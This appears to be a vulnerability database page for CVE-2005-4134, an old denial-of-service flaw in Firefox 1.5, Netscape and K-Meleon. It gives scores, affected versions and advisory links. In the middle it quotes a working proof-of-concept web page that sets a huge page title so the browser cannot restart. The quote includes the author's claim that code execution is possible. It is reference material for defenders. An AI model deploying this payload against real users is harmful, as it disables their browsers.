CVE-2005-4134: Details

CVE-2005-4134

94.9% V3 Network
2005-12-09 14:00 +00:00
2018-10-19 12:57 +00:00

CVE Descriptions

Mozilla Firefox 1.5, Netscape 8.0.4 and 7.2, and K-Meleon before 0.9.12 allows remote attackers to cause a denial of service (CPU consumption and delayed application startup) via a web site with a large title, which is recorded in history.dat but not processed efficiently during startup. NOTE: despite initial reports, the Mozilla vendor does not believe that this issue can be used to trigger a crash or buffer overflow in Firefox. Also, it has been independently reported that Netscape 8.1 does not have this issue.

CVE Information

Metrics

Metrics   Score   Severity   CVSS Vector                  Source
V2        5                  AV:N/AC:L/Au:N/C:N/I:N/A:P   nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare the EPSS score of one CVE against that of other CVEs.

Exploit Information

Exploit Database EDB-ID: 26762

Publication date: 2005-12-07 23:00 +00:00
Author: ZIPLOCK
EDB Verified: Yes

source: https://www.securityfocus.com/bid/15773/info

Mozilla Firefox is reportedly prone to a remote denial-of-service vulnerability. This issue presents itself when the browser handles a large entry in the 'history.dat' file.

An attacker may trigger this issue by enticing a user to visit a malicious website and by supplying excessive data to be stored in the affected file. This may cause a denial-of-service condition.

UPDATE: Proof-of-concept exploit code has been published. The author of the code attributes the crash to a buffer-overflow condition. Symantec has not reproduced the alleged flaw.

<!--
Firefox 1.5 buffer overflow

Basically firefox logs all kinds of URL data in its history.dat file, this little script will set a really large topic and Firefox will then save that topic into its history.dat.. The next time that firefox is opened, it will instantly crash due to a buffer overflow -- this will happen every time until you manually delete the history.dat file -- which most users won't figure out.

this proof of concept will only prevent someone from reopening their browser after being exploited. DoS if you will. however, code execution is possible with some modifications.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <sickbeatz@gmail.com>
-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
    // Build a 5000-character string.
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
        buffer += "A";
    }
    // Append it 500 more times, then use the result as the page title,
    // which the browser records in history.dat.
    var buffer2 = buffer;
    for (i = 0; i < 500; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME </a></body></html>

Products Mentioned

Configuration 0

K-meleon_project>>K-meleon >> Version To (including) 0.9
K-meleon_project>>K-meleon >> Version 0.7
K-meleon_project>>K-meleon >> Version 0.7_service_pack_1
K-meleon_project>>K-meleon >> Version 0.8
K-meleon_project>>K-meleon >> Version 0.8.1
K-meleon_project>>K-meleon >> Version 0.8.2
Mozilla>>Firefox >> Version To (including) 1.5
Mozilla>>Mozilla_suite >> Version To (including) 1.7.12
Netscape>>Navigator >> Version To (including) 8.0.40
Netscape>>Navigator >> Version 7.1
Netscape>>Navigator >> Version 7.2

References

    http://www.mandriva.com/security/advisories?name=MDKSA-2006:036
    Tags : vendor-advisory, x_refsource_MANDRIVA
    https://usn.ubuntu.com/275-1/
    Tags : vendor-advisory, x_refsource_UBUNTU
    http://secunia.com/advisories/19902
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.osvdb.org/21533
    Tags : vdb-entry, x_refsource_OSVDB
    http://www.mandriva.com/security/advisories?name=MDKSA-2006:037
    Tags : vendor-advisory, x_refsource_MANDRIVA
    http://secunia.com/advisories/17944
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/19941
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/17946
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://marc.info/?l=full-disclosure&m=113405896025702&w=2
    Tags : mailing-list, x_refsource_FULLDISC
    http://www.gentoo.org/security/en/glsa/glsa-200604-12.xml
    Tags : vendor-advisory, x_refsource_GENTOO
    http://secunia.com/advisories/21622
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/19862
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/19230
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/18704
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.debian.org/security/2006/dsa-1051
    Tags : vendor-advisory, x_refsource_DEBIAN
    http://secunia.com/advisories/18709
    Tags : third-party-advisory, x_refsource_SECUNIA
    https://usn.ubuntu.com/271-1/
    Tags : vendor-advisory, x_refsource_UBUNTU
    http://secunia.com/advisories/18705
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.gentoo.org/security/en/glsa/glsa-200604-18.xml
    Tags : vendor-advisory, x_refsource_GENTOO
    http://www.securityfocus.com/bid/16476
    Tags : vdb-entry, x_refsource_BID
    http://www.vupen.com/english/advisories/2006/0413
    Tags : vdb-entry, x_refsource_VUPEN
    http://securitytracker.com/id?1015328
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/19746
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/21033
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/18700
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://sunsolve.sun.com/search/document.do?assetkey=1-26-102550-1
    Tags : vendor-advisory, x_refsource_SUNALERT
    http://secunia.com/advisories/19759
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.redhat.com/support/errata/RHSA-2006-0200.html
    Tags : vendor-advisory, x_refsource_REDHAT
    http://secunia.com/advisories/18706
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/17934
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/15773
    Tags : vdb-entry, x_refsource_BID
    http://www.redhat.com/support/errata/RHSA-2006-0199.html
    Tags : vendor-advisory, x_refsource_REDHAT
    http://secunia.com/advisories/19863
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/archive/1/425978/100/0/threaded
    Tags : vendor-advisory, x_refsource_FEDORA
    http://secunia.com/advisories/18708
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.vupen.com/english/advisories/2005/2805
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.securityfocus.com/archive/1/425975/100/0/threaded
    Tags : vendor-advisory, x_refsource_FEDORA
    http://marc.info/?l=full-disclosure&m=113404911919629&w=2
    Tags : mailing-list, x_refsource_FULLDISC
    http://sunsolve.sun.com/search/document.do?assetkey=1-26-228526-1
    Tags : vendor-advisory, x_refsource_SUNALERT
    http://secunia.com/advisories/19852
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.vupen.com/english/advisories/2006/3391
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.debian.org/security/2006/dsa-1046
    Tags : vendor-advisory, x_refsource_DEBIAN
    http://www.debian.org/security/2006/dsa-1044
    Tags : vendor-advisory, x_refsource_DEBIAN